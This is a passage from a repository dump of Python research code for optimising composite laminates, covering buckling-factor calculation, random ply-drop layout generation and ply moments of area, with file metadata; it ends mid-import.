"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to calculate buckling resistance\r\n\r\n- buckling_margin\r\n calculates buckling margins from src.buckling factors\r\n\r\n- buckling_factor_ss\r\n calculates the critical buckling factor of a simply-supported orthotropic\r\n laminate plate based on the stacking sequqnce\r\n\r\n- buckling_factor_lampam\r\n calculates the critical buckling factor of a simply-supported orthotropic\r\n laminate plate based on lamination parameters\r\n\r\n- buckling_factor_m_n\r\n returns the buckling factor of a simply-supported orthotropic laminate\r\n for a specific buckling mode, based on out-of-plane stiffnesses\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport math\r\nimport numpy as np\r\nfrom src.BELLA.materials import Material\r\nfrom src.CLA.lampam_functions import calc_lampam\r\n\r\ndef buckling_margin(buckling_factor):\r\n 'calculates buckling margins from src.buckling factors'\r\n return 100*(buckling_factor - 1)\r\n\r\n\r\ndef buckling_factor_ss(ss, N_x, N_y, length_x, length_y, mat, n_modes=10):\r\n \"\"\"\r\n calculates the critical buckling factor of a simply-supported orthotropic\r\n laminate plate based on the stacking sequqnce\r\n\r\n INPUT\r\n\r\n - ss: stacking sequence of the laminate\r\n - mat: material properties\r\n - length_x: plate dimensions (x-direction)\r\n - length_y: plate dimensions (y-direction)\r\n - N_x: compressive loading intensity in the x-direction\r\n - N_y: compressive loading intensity in the x-direction\r\n - n_modes: number of buckling modes to be tested\r\n \"\"\"\r\n lampam_1 = calc_lampam(ss)\r\n n_plies = ss.size\r\n return buckling_factor(\r\n lampam_1, mat, n_plies, N_x=N_x, N_y=N_y,\r\n length_x=length_x, length_y=length_y, n_modes=n_modes)\r\n\r\n\r\ndef buckling_factor(\r\n lampam, mat, n_plies, N_x=0, N_y=0, length_x=1, length_y=1, n_modes=10):\r\n \"\"\"\r\n calculates the critical buckling factor of a simply-supported orthotropic\r\n laminate plate based on lamination parameters\r\n\r\n INPUT\r\n\r\n - lampam: lamination parameters\r\n - mat: material properties\r\n - length_x: plate dimensions (x-direction)\r\n - length_y: plate dimensions (y-direction)\r\n - N_x: compressive loading intensity in the x-direction\r\n - N_y: compressive loading intensity in the x-direction\r\n - n_modes: number of buckling modes to be tested\r\n \"\"\"\r\n buck = np.zeros((n_modes, n_modes), dtype=float)\r\n a = (1/12)*((n_plies*mat.ply_t)**3)\r\n if lampam.size == 12:\r\n D11 = a * (mat.U1 + mat.U2*lampam[8] + mat.U3*lampam[9])\r\n D12 = a *(-mat.U3*lampam[9] + mat.U4)\r\n D22 = a *(mat.U1 - mat.U2*lampam[8] + mat.U3*lampam[9])\r\n D66 = a *(-mat.U3*lampam[9] + mat.U5)\r\n else:\r\n D11 = a * (mat.U1 + mat.U2*lampam[0] + mat.U3*lampam[1])\r\n D12 = a *(-mat.U3*lampam[1] + mat.U4)\r\n D22 = a *(mat.U1 - mat.U2*lampam[0] + mat.U3*lampam[1])\r\n D66 = a *(-mat.U3*lampam[0] + mat.U5)\r\n for mode_m in range(n_modes):\r\n for mode_n in range(n_modes):\r\n buck[mode_m, mode_n] = buckling_factor_m_n(\r\n D11, D12, D22, D66,\r\n mode_m=mode_m + 1,\r\n mode_n=mode_n + 1,\r\n N_x=N_x, N_y=N_y,\r\n length_x=length_x,\r\n length_y=length_y)\r\n return np.min(buck)\r\n\r\n\r\ndef buckling_factor_m_n(\r\n D11, D12, D22, D66, mode_m=1, mode_n=1,\r\n N_x=0, N_y=0, length_x=1, length_y=1):\r\n \"\"\"\r\n returns the buckling factor of a simply-supported orthotropic laminate\r\n for a specific buckling mode, based on out-of-plane stiffnesses\r\n\r\n INPUT\r\n\r\n - D11, D12, D22 and D66: out-of-plane stifnesses\r\n - length_x: plate dimensions (x-direction)\r\n - length_y: plate dimensions (y-direction)\r\n - N_x: compressive loading intensity in the x-direction\r\n - N_y: compressive loading intensity in the x-direction\r\n - mode_m: buckling mode (number of half-waves) in the x direction\r\n - mode_n: buckling mode (number of half-waves) in the y direction\r\n \"\"\"\r\n alpha = (mode_m/length_x)**2\r\n beta = (mode_n/length_y)**2\r\n return (math.pi**2)*(D11*alpha**2 \\\r\n + 2*(D12 + 2*D66)*alpha*beta \\\r\n + D22*beta**2)/(alpha*abs(N_x) + beta*abs(N_y))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('*** Test for the functions buckling_factor_ss ***\\n')\r\n # Elastic modulus in the fibre direction in Pa\r\n E11 = 20.5/1.45038e-10 # 141 GPa\r\n # Elastic modulus in the transverse direction in Pa\r\n E22 = 1.31/1.45038e-10 # 9.03 GPa\r\n # Poisson's ratio relating transverse deformation and axial loading (-)\r\n nu12 = 0.32\r\n # In-plane shear modulus in Pa\r\n G12 = 0.62/1.45038e-10 # 4.27 GPa\r\n # Density in g/m2\r\n density_area = 300.5\r\n # Ply thickness in m\r\n ply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n\r\n # panel 17\r\n ss = np.array([45, 60, 45, 90, 90, -45, -60, -45, 0]) # panel 17 Irisarri 1\r\n ss = np.array([60, -60, 60, -60, 60, -60, -75, 60, 75]) # panel 17 Adams\r\n ss = np.array([45, -45, 45, -45, 45, -45, 60, -60, 60, -30]) # panel 17 Serestra\r\n N_x = 1000*0.175127*320\r\n N_y = 1000*0.175127*180\r\n length_x = 20*(25.40/1000)\r\n length_y = 12*(25.40/1000)\r\n# # panel 7\r\n# N_x = 1000*0.175127*290\r\n# N_y = 1000*0.175127*195\r\n# length_x = 20*(25.40/1000)\r\n# length_y = 12*(25.40/1000)\r\n# ss = np.array([45, 60, 45, 90, 90, -45, -60, -45, 0]) # panel 7 Irisarri 1\r\n# ss = np.array([60, -60, 60, -60, 60, -60, -75, 60, 75]) # panel 7 Adams\r\n# ss = np.array([45, -45, 45, -45, 45, -45, 60, -60, 60, -30]) # panel 7 Serestra\r\n # panel 5\r\n ss = np.array([45, -45, 45, -45, 45, -45, 60, -60]) # panel 5 Serestra\r\n ss = np.array([-60, -60, -60, -60, -60, -60, -60, -60]) # my test\r\n N_x = 1000*0.175127*210\r\n N_y = 1000*0.175127*100\r\n length_x = 20*(25.40/1000)\r\n length_y = 12*(25.40/1000)\r\n ss = np.hstack((ss, np.flip(ss, axis=0)))\r\n print(ss)\r\n buck = buckling_factor_ss(ss, N_x, N_y, length_x, length_y, mat, n_modes=10)\r\n print(f'Buckling factor : {buck }\\n')\r\n print(f'Buckling margin : {buckling_margin(buck)}\\n')\r\n\r\n\r\n print('*** Test for the functions buckling_factor ***\\n')\r\n # Lamination paraneters calculation\r\n ss = np.array([-30, 30, 45, -45, 45, 60, -60,\r\n 60, -60, 60, -60, -75, 60, 75])\r\n n_plies = ss.size\r\n lampam = calc_lampam(ss)\r\n # Elastic modulus in the fibre direction in Pa\r\n E11 = 20.5/1.45038e-10 # 141 GPa\r\n # Elastic modulus in the transverse direction in Pa\r\n E22 = 1.31/1.45038e-10 # 9.03 GPa\r\n # Poisson's ratio relating transverse deformation and axial loading (-)\r\n nu12 = 0.32\r\n # In-plane shear modulus in Pa\r\n G12 = 0.62/1.45038e-10 # 4.27 GPa\r\n # Density in g/m2\r\n density_area = 300.5\r\n # Ply thickness in m\r\n ply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n # Loading intensities\r\n N_x = 1000*0.175127*375\r\n N_y = 1000*0.175127*360\r\n length_x = 18*(25.40/1000)\r\n length_y = 24*(25.40/1000)\r\n buck = buckling_factor(lampam, mat, n_plies, N_x=N_x, N_y=N_y,\r\n length_x=length_x, length_y=length_y)\r\n print(f'Buckling factor : {buck}\\n')\r\n print(f'Buckling margin : {buckling_margin(buck)}\\n')\r\n\r\n print('*** Test for the functions buckling_factor_m_n ***\\n')\r\n # Lamination paraneters calculation\r\n ss = np.array([-30, 30, 45, -45, 45, 60, -60,\r\n 60, -60, 60, -60, -75, 60, 75])\r\n n_plies = ss.size\r\n lampam = calc_lampam(ss)\r\n # Elastic modulus in the fibre direction in Pa\r\n E11 = 20.5/1.45038e-10 # 141 GPa\r\n # Elastic modulus in the transverse direction in Pa\r\n E22 = 1.31/1.45038e-10 # 9.03 GPa\r\n # Poisson's ratio relating transverse deformation and axial loading (-)\r\n nu12 = 0.32\r\n # In-plane shear modulus in Pa\r\n G12 = 0.62/1.45038e-10 # 4.27 GPa\r\n # Density in g/m2\r\n density_area = 300.5\r\n # Ply thickness in m\r\n ply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n # Loading intensities\r\n N_x = 1000*0.175127*375\r\n N_y = 1000*0.175127*360\r\n length_x = 18*(25.40/1000)\r\n length_y = 24*(25.40/1000)\r\n # Buckling modes\r\n mode_m = 1\r\n mode_n = 1\r\n # out-of-plane stiffnesses\r\n a = (1/12)*((n_plies*mat.ply_t)**3)\r\n D11 = a * (mat.U1 + mat.U2*lampam[8] + mat.U3*lampam[9])\r\n D12 = a *(-mat.U3*lampam[9] + mat.U4)\r\n D22 = a *(mat.U1 - mat.U2*lampam[8] + mat.U3*lampam[9])\r\n D66 = a *(-mat.U3*lampam[9] + mat.U5)\r\n buck = buckling_factor_m_n(D11, D12, D22, D66,\r\n mode_m=mode_m, mode_n=mode_n, N_x=N_x, N_y=N_y,\r\n length_x=length_x, length_y=length_y)\r\n print(f'Buckling factor : {buck}\\n')\r\n print(f'Buckling margin : {buckling_margin(buck)}\\n')\r\n\r\n\r\n print('*** Test for the functions buckling_factor ***\\n')\r\n # panel 18 terence\r\n n_plies = 22\r\n lampam = np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.469, -0.335, 0, 0])\r\n # Elastic modulus in the fibre direction in Pa\r\n E11 = 20.5/1.45038e-10 # 141 GPa\r\n # Elastic modulus in the transverse direction in Pa\r\n E22 = 1.31/1.45038e-10 # 9.03 GPa\r\n # Poisson's ratio relating transverse deformation and axial loading (-)\r\n nu12 = 0.32\r\n # In-plane shear modulus in Pa\r\n G12 = 0.62/1.45038e-10 # 4.27 GPa\r\n # Density in g/m2\r\n density_area = 300.5\r\n # Ply thickness in m\r\n ply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n # Loading intensities\r\n N_x = 1000*0.175127*(-300)\r\n N_y = 1000*0.175127*(-410)\r\n length_x = 20*(25.40/1000)\r\n length_y = 12*(25.40/1000)\r\n buck = buckling_factor(lampam, mat, n_plies, N_x=N_x, N_y=N_y,\r\n length_x=length_x, length_y=length_y)\r\n print(f'1 - buckling factor : {1 - buck}\\n')\r\n\r\n # panel 18 moi\r\n n_plies = 22\r\n lampam = np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.416, -0.451, 0, 0])\r\n # Elastic modulus in the fibre direction in Pa\r\n E11 = 20.5/1.45038e-10 # 141 GPa\r\n # Elastic modulus in the transverse direction in Pa\r\n E22 = 1.31/1.45038e-10 # 9.03 GPa\r\n # Poisson's ratio relating transverse deformation and axial loading (-)\r\n nu12 = 0.32\r\n # In-plane shear modulus in Pa\r\n G12 = 0.62/1.45038e-10 # 4.27 GPa\r\n # Density in g/m2\r\n density_area = 300.5\r\n # Ply thickness in m\r\n ply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n # Loading intensities\r\n N_x = 1000*0.175127*(-300)\r\n N_y = 1000*0.175127*(-410)\r\n length_x = 20*(25.40/1000)\r\n length_y = 12*(25.40/1000)\r\n buck = buckling_factor(lampam, mat, n_plies, N_x=N_x, N_y=N_y,\r\n length_x=length_x, length_y=length_y)\r\n print(f'1 - buckling factor : {1 - buck}\\n')"
},
{
"alpha_fraction": 0.5588285326957703,
"alphanum_fraction": 0.5668545365333557,
"avg_line_length": 36.91029739379883,
"blob_id": "0aaf8989294b5b18d72bddda4ea0acf51daac881",
"content_id": "d7f2f941d3179f8ddf24207bd59a1cfeac53c741",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11712,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 301,
"path": "/src/BELLA/pdl_group.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions used to generate manufacturable ply drop layouts with guide-based\r\nblending\r\n\r\n- format_ply_drops and format_ply_drops2\r\n format the ply drop layouts\r\n\r\n- ply_drops_rules\r\n deletes the ply drop layouts that does not satisfy the ply drop guidelines\r\n\r\n- randomly_pdl_guide\r\n randomly generates manufacturable ply drop layouts\r\n\r\nGuidelines:\r\n1: The first two outer plies should not be stopped\r\n2: The number of ply drops should be minimal (not butt joints)\r\n3: The ply drops should be distributed as evenly as possible along the\r\n thickness of the laminates\r\n4: If this is not exactly possible the ply drops should rather be\r\n concentrated in the larger groups (because smaller groups have a\r\n smaller design space)\r\n5: Then ply drops away from the middle plane are prefered to limit fibre\r\n waviness\r\n\"\"\"\r\nimport sys\r\nimport time\r\nimport random\r\nimport numpy as np\r\nimport scipy.special\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.BELLA.pdl_tools import format_ply_drops\r\nfrom src.BELLA.pdl_tools import ply_drops_at_each_boundaries\r\nfrom src.BELLA.pdl_tools import format_ply_drops2\r\n\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\ndef randomly_pdl_guide(\r\n boundaries,\r\n n_ply_drops,\r\n n_max,\r\n parameters,\r\n obj_func_param,\r\n constraints,\r\n multipanel,\r\n n_pdl_max=1,\r\n pdl_before=None,\r\n pdl_after=None,\r\n last_group=False,\r\n covering_top=False,\r\n covering_bottom=False,\r\n has_middle_ply=False,\r\n middle_ply_indices=np.array((), dtype='int16')):\r\n \"\"\"\r\n randomly generates ply drop layouts that best satisfy the spacing and\r\n stacking rules within a limited time.\r\n\r\n INPUTS\r\n - n_ply_drops: list of the number of ply drops for each group compared to\r\n the groups thickest of the thickest laminate\r\n - n_max: maximum number of plies for the group\r\n - n_pdl_max: number of ply drop layouts asked\r\n - pdl_before: matrix of ply drop layouts for the group placed above\r\n - pdl_after: matrix of ply drop layouts for the group placed below\r\n - last_group: true for the last groups\r\n - constraints: design guidelines\r\n - parameters: optimiser parameters\r\n - multpanel: multi-panel structure\r\n - obj_func_param: objective function parameters\r\n - if covering_top = True, the top ply cannot be dropped\r\n - if covering_bottom = True, the bottom ply cannot be dropped\r\n - has_middle_ply: True if a panel has a middle ply\r\n \"\"\"\r\n# print('boundaries', boundaries)\r\n# print('n_ply_drops', n_ply_drops)\r\n# print('n_max', n_max)\r\n# print('n_pdl_max', n_pdl_max)\r\n# print('last_group', last_group)\r\n# print('pdl_before', pdl_before)\r\n# print('has_middle_ply', has_middle_ply)\r\n# print('middle_ply_indices', middle_ply_indices)\r\n\r\n# # boundaries one panel to another by increasing order of thickness\r\n# boundaries = np.zeros((0, 2), dtype='int16')\r\n# for ind_panel in range(n_ply_drops.size - 1):\r\n# boundaries = np.vstack((\r\n# boundaries, np.array([ind_panel, ind_panel + 1], dtype='int16')))\r\n\r\n n_ply_drops_unique = np.unique(n_ply_drops)\r\n n_unique = n_ply_drops_unique.size\r\n # dictionary to retrieve indices related to the number of ply drops\r\n indices_unique = dict()\r\n for index, unique_index in enumerate(n_ply_drops_unique):\r\n indices_unique[unique_index] = index\r\n\r\n combi = []\r\n for drops in n_ply_drops_unique:\r\n # combi = list of the position that can take the ply drops per panel\r\n combi.append(scipy.special.comb(n_max, drops))\r\n\r\n n_pdl = int(min(np.product(combi), n_pdl_max))\r\n #print('n_pdl', n_pdl)\r\n # length of the group ply drop layout\r\n if last_group and has_middle_ply:\r\n n_maxx = n_max + 1\r\n else:\r\n n_maxx = n_max\r\n\r\n pdl_perfect = np.zeros((n_pdl, n_ply_drops.size, n_maxx), dtype=int)\r\n pdl_imperfect = np.zeros((n_pdl, n_ply_drops.size, n_maxx), dtype=int)\r\n p_spacing_imperfect = np.zeros((n_pdl,), dtype=float)\r\n\r\n ind_imperfect = 0\r\n ind_perfect = 0\r\n t_ini = time.time()\r\n elapsed_time = 0\r\n\r\n\r\n #print('n_pdl', n_pdl)\r\n while ind_perfect < n_pdl \\\r\n and elapsed_time < parameters.time_limit_group_pdl:\r\n #print('ind_perfect', ind_perfect)\r\n #print('ind_imperfect', ind_imperfect)\r\n\r\n # randomly chose a pdl\r\n new_pdl = [[]]*n_unique\r\n if covering_top and covering_bottom:\r\n new_pdl[n_unique - 1] = random.sample(\r\n range(1, n_max - 1), n_ply_drops_unique[n_unique - 1])\r\n elif covering_top:\r\n new_pdl[n_unique - 1] = random.sample(\r\n range(1, n_max), n_ply_drops_unique[n_unique - 1])\r\n elif covering_bottom:\r\n new_pdl[n_unique - 1] = random.sample(\r\n range(n_max - 1), n_ply_drops_unique[n_unique - 1])\r\n else:\r\n new_pdl[n_unique - 1] = random.sample(\r\n range(n_max), n_ply_drops_unique[n_unique - 1])\r\n\r\n # for guide-based blending, not generalised blending\r\n for ind_panel in range(n_unique - 1)[::-1]:\r\n new_pdl[ind_panel] = new_pdl[ind_panel + 1][:]\r\n n_to_del = n_ply_drops_unique[ind_panel + 1] \\\r\n - n_ply_drops_unique[ind_panel]\r\n to_del = random.sample(\r\n list(range(len(new_pdl[ind_panel]))), n_to_del)\r\n new_pdl[ind_panel] = [\r\n elem for ind_elem, elem in enumerate(new_pdl[ind_panel]) \\\r\n if ind_elem not in to_del]\r\n\r\n # Formatting the ply drop layout in the form as in the example:\r\n # [[0 1 2 3]\r\n # [-1 -1 2 3]\r\n # [-1 -1 -1 3]]\r\n # for a pdl with three panels\r\n # the first panel having the four plies of index 0, 1, 2, 3\r\n # the second panel having 2 plies of index 2 and 3\r\n # the last panel having only the ply of index 3\r\n #print('new_pdl', new_pdl)\r\n new_pdl = format_ply_drops(new_pdl, n_max)\r\n # <class 'numpy.ndarray'>\r\n# print('new_pdl')\r\n# print(new_pdl)\r\n\r\n if last_group and has_middle_ply:\r\n middle = -(middle_ply_indices[:-1] != 0).astype(int)\r\n# print('middle', middle)\r\n middle = middle.reshape((new_pdl.shape[0], 1))\r\n# print('middle', middle)\r\n new_pdl = np.hstack((new_pdl, middle))\r\n\r\n\r\n # Formatting the ply drop layout so that a ply drop scheme is\r\n # associated to each panel boundary\r\n new_pdl = ply_drops_at_each_boundaries(\r\n new_pdl, n_ply_drops_unique, indices_unique, n_ply_drops)\r\n # <class 'numpy.ndarray'>\r\n# print('new_pdl')\r\n# print(new_pdl)\r\n\r\n # Application ply drop spacing and stacking rules:\r\n # - Ply drops should be separated by at least min_drop plies\r\n\r\n # for the last groups of symmetric laminates\r\n if last_group and constraints.sym:\r\n if has_middle_ply:\r\n pdl_after = np.flip(np.copy(new_pdl[:, :-1]), axis=1)\r\n # print(new_pdl)\r\n else:\r\n pdl_after = np.flip(np.copy(new_pdl), axis=1)\r\n\r\n p_spacing = calc_penalty_spacing(\r\n pdl=new_pdl,\r\n pdl_before=pdl_before,\r\n pdl_after=pdl_after,\r\n multipanel=multipanel,\r\n obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n on_blending_strip=True)\r\n\r\n# print('p_spacing', p_spacing)\r\n # <class 'numpy.ndarray'>\r\n# print('new_pdl1')\r\n# print(new_pdl)\r\n\r\n # Formatting the ply drop layout in the form as in the example:\r\n # [[0 1 2 3]\r\n # [-1 -1 1 2]\r\n # [-1 -1 -1 1]]\r\n # for a pdl: with three panels\r\n # the first panel having the four plies of index 0, 1, 2, 3\r\n # the second panel having 2 plies of index 2 and 3\r\n # the last panel having only the ply of index 3\r\n new_pdl = format_ply_drops2(new_pdl).astype(int)\r\n # <class 'numpy.ndarray'>\r\n# print('new_pdl', new_pdl)\r\n\r\n elapsed_time = time.time() - t_ini\r\n\r\n # Store the new pdl if it is perfect (no violation of manufacturing\r\n # constraint) or if it is among the n_pdl best unmanufacturable\r\n # solutions found so far\r\n if p_spacing == 0:\r\n # To remove duplicates\r\n is_double = False\r\n for ind in range(ind_perfect):\r\n if np.allclose(new_pdl, pdl_perfect[ind]):\r\n is_double = True\r\n break\r\n if is_double:\r\n continue\r\n #print('is_double', is_double)\r\n pdl_perfect[ind_perfect] = new_pdl\r\n ind_perfect += 1\r\n else:\r\n # To only keep the imperfect pdl with the smallest penalties\r\n if ind_imperfect >= n_pdl:\r\n if p_spacing < max(p_spacing_imperfect):\r\n # To remove duplicates\r\n is_double = False\r\n for ind in range(ind_imperfect):\r\n if np.allclose(new_pdl, pdl_imperfect[ind]):\r\n is_double = True\r\n break\r\n if is_double:\r\n continue\r\n #print('is_double', is_double)\r\n indexx = np.argmin(p_spacing_imperfect)\r\n pdl_imperfect[indexx] = new_pdl\r\n p_spacing_imperfect[indexx] = p_spacing\r\n else:\r\n # To remove duplicates\r\n is_double = False\r\n for ind in range(ind_imperfect):\r\n if np.allclose(new_pdl, pdl_imperfect[ind]):\r\n is_double = True\r\n break\r\n if is_double:\r\n continue\r\n #print('is_double', is_double)\r\n# print(new_pdl)\r\n# print(ind_imperfect)\r\n# print(pdl_imperfect.shape)\r\n pdl_imperfect[ind_imperfect] = new_pdl\r\n p_spacing_imperfect[ind_imperfect] = p_spacing\r\n ind_imperfect += 1\r\n\r\n\r\n # if the time limit is reached\r\n if elapsed_time >= parameters.time_limit_group_pdl:\r\n\r\n pdl_imperfect = pdl_imperfect[:ind_imperfect]\r\n p_spacing_imperfect = p_spacing_imperfect[:ind_imperfect]\r\n #print('pdl_perfect', pdl_perfect)\r\n #print('pdl_imperfect', pdl_imperfect)\r\n\r\n if not ind_imperfect + ind_perfect:\r\n print('n_ply_drops', n_ply_drops)\r\n print('n_max', n_max)\r\n print('min_drop', constraints.min_drop)\r\n print('pdl_before', pdl_before)\r\n print('pdl_after', pdl_after)\r\n raise Exception(\"\"\"\r\nNo conform ply drop layout can be generated.\r\nToo many ply drops between two adjacent panels.\"\"\")\r\n\r\n\r\n # add the non-manufacturable ply drop layouts\r\n for ind in range(ind_perfect, n_pdl_max):\r\n indexx = np.argmin(p_spacing_imperfect)\r\n pdl_perfect[ind] = pdl_imperfect[indexx]\r\n p_spacing_imperfect[indexx] = 10e6\r\n\r\n return pdl_perfect\r\n # if enough manufacturable ply drop layouts have been found\r\n return pdl_perfect\r\n"
},
{
"alpha_fraction": 0.5562905669212341,
"alphanum_fraction": 0.569280743598938,
"avg_line_length": 34.29694366455078,
"blob_id": "f37c8f97e791b7f0be0f9b5013a5e31649e04aaf",
"content_id": "ef486d2e0873dee1e3afb775c65897316dc26e41",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8314,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 229,
"path": "/src/BELLA/moments_of_areas.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to calculate moments of areas\r\n\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\n\r\ndef calc_mom_of_areas(multipanel, constraints, ply_order):\r\n \"\"\"\r\n calulates ply moments of areas\r\n\r\n OUTPUS\r\n\r\n - mom_areas_plus[panel_index, ply_index, 0]:\r\n signed area of ply of index 'ply_index' in panel of index 'panel_index'\r\n - mom_areas_plus[panel_index, ply_index, 1]:\r\n signed first moment of area of ply of index 'ply_index' in panel of\r\n index 'panel_index'\r\n - mom_areas_plus[panel_index, ply_index, 2]:\r\n signed second moment of area of ply of index 'ply_index' in panel of\r\n index 'panel_index'\r\n\r\n - mom_areas[panel_index, ply_index, 0]:\r\n area of ply of index 'ply_index' in panel of index 'panel_index'\r\n - mom_areas[panel_index, ply_index, 1]:\r\n first moment of area of ply of index 'ply_index' in panel of index\r\n 'panel_index'\r\n - mom_areas[panel_index, ply_index, 2]:\r\n second moment of area of ply of index 'ply_index' in panel of index\r\n 'panel_index'\r\n\r\n INPUTS\r\n\r\n - constraints: lay-up design guidelines\r\n - multipanel: multi-panel structure\r\n - ply_order: ply indices sorted in the order in which plies are optimised\r\n \"\"\"\r\n mom_areas_plus = []\r\n mom_areas = []\r\n\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n\r\n if constraints.sym:\r\n\r\n ply_indices = np.arange(panel.n_plies // 2 + panel.n_plies % 2)\r\n mom_areas_panel = np.zeros((\r\n panel.n_plies // 2 + panel.n_plies % 2, 3), float)\r\n mom_areas_plus_panel = np.zeros((\r\n panel.n_plies // 2 + panel.n_plies % 2, 3), float)\r\n\r\n pos_bot = (2 / panel.n_plies) * ply_indices - 1\r\n pos_top = (2 / panel.n_plies) * (ply_indices + 1) - 1\r\n\r\n if panel.n_plies % 2:\r\n pos_top[-1] = 0\r\n\r\n# print(pos_bot)\r\n# print(pos_top)\r\n\r\n mom_areas_panel[:, 0] = pos_top - pos_bot\r\n mom_areas_panel[:, 1] = 0\r\n mom_areas_panel[:, 2] = pos_top**3 - pos_bot**3\r\n\r\n mom_areas_plus_panel[:, 0] = pos_top - pos_bot\r\n mom_areas_plus_panel[:, 1] = abs(pos_top**2 - pos_bot**2)\r\n mom_areas_plus_panel[:, 2] = pos_top**3 - pos_bot**3\r\n\r\n else:\r\n mom_areas_panel = np.zeros((panel.n_plies, 3), float)\r\n mom_areas_plus_panel = np.zeros((panel.n_plies, 3), float)\r\n\r\n ply_indices = np.arange(panel.n_plies)\r\n\r\n print(ply_indices, type(ply_indices))\r\n print(ply_order, type(ply_order))\r\n pos_bot = ((2 / panel.n_plies) \\\r\n * ply_indices - 1)[ply_order[ind_panel]]\r\n pos_top = ((2 / panel.n_plies) \\\r\n * (ply_indices + 1) - 1)[ply_order[ind_panel]]\r\n\r\n mom_areas_panel[:, 0] = pos_top - pos_bot\r\n mom_areas_panel[:, 1] = pos_top**2 - pos_bot**2\r\n mom_areas_panel[:, 2] = pos_top**3 - pos_bot**3\r\n mom_areas_panel /= 2\r\n\r\n\r\n for ind in range(panel.n_plies):\r\n\r\n if pos_top[ind] * pos_bot[ind] >= 0:\r\n mom_areas_plus_panel[\r\n ind, 0] = abs(pos_top[ind] - pos_bot[ind])\r\n mom_areas_plus_panel[\r\n ind, 1] = abs(pos_top[ind]**2 - pos_bot[ind]**2)\r\n mom_areas_plus_panel[\r\n ind, 2] = abs(pos_top[ind]**3 - pos_bot[ind]**3)\r\n else:\r\n mom_areas_plus_panel[\r\n ind, 0] = abs(pos_top[ind]) + abs(pos_bot[ind])\r\n mom_areas_plus_panel[\r\n ind, 1] = abs(pos_top[ind]**2) + abs(pos_bot[ind]**2)\r\n mom_areas_plus_panel[\r\n ind, 2] = abs(pos_top[ind]**3) + abs(pos_bot[ind]**3)\r\n\r\n mom_areas_plus_panel /= 2\r\n\r\n mom_areas_plus.append(mom_areas_plus_panel)\r\n mom_areas.append(mom_areas_panel)\r\n\r\n return mom_areas_plus, mom_areas\r\n\r\n\r\ndef calc_mom_of_areas2(multipanel, constraints, mom_areas_plus, pdl,\r\n n_plies_to_optimise):\r\n \"\"\"\r\n calulates ply moments of areas\r\n\r\n OUTPUS\r\n\r\n - cummul_areas[panel_index][ply_index, 0]:\r\n\r\n\r\n INPUTS\r\n\r\n - constraints: lay-up design guidelines\r\n - multipanel: multi-panel structure\r\n - pdl: ply drop layout\r\n - mom_areas_plus[panel_index, ply_index, 0]:\r\n signed area of ply of index 'ply_index' in panel of index 'panel_index'\r\n - mom_areas_plus[panel_index, ply_index, 1]:\r\n signed first moment of area of ply of index 'ply_index' in panel of\r\n index 'panel_index'\r\n - mom_areas_plus[panel_index, ply_index, 2]:\r\n signed second moment of area of ply of index 'ply_index' in panel of\r\n index 'panel_index'\r\n - n_plies_to_optimise: number of plies to optimise during BELLA step 2\r\n \"\"\"\r\n\r\n cummul_areas = np.zeros(\r\n (multipanel.reduced.n_panels, n_plies_to_optimise), float)\r\n cummul_first_mom_areas = np.zeros(\r\n (multipanel.reduced.n_panels, n_plies_to_optimise), float)\r\n cummul_sec_mom_areas = np.zeros(\r\n (multipanel.reduced.n_panels, n_plies_to_optimise), float)\r\n\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n counter_plies = -1\r\n for index_ply in range(n_plies_to_optimise):\r\n if pdl[ind_panel, index_ply] != -1:\r\n counter_plies += 1\r\n\r\n cummul_areas[ind_panel, index_ply:] \\\r\n += mom_areas_plus[ind_panel][counter_plies][0]\r\n\r\n cummul_first_mom_areas[ind_panel, index_ply:] \\\r\n += mom_areas_plus[ind_panel][counter_plies][1]\r\n\r\n cummul_sec_mom_areas[ind_panel, index_ply:] \\\r\n += mom_areas_plus[ind_panel][counter_plies][2]\r\n\r\n return cummul_areas, cummul_first_mom_areas, cummul_sec_mom_areas\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('*** Test for the functions calc_moment_of_areas ***\\n')\r\n import sys\r\n sys.path.append(r'C:\\BELLA')\r\n\r\n from src.BELLA.constraints import Constraints\r\n from src.BELLA.panels import Panel\r\n from 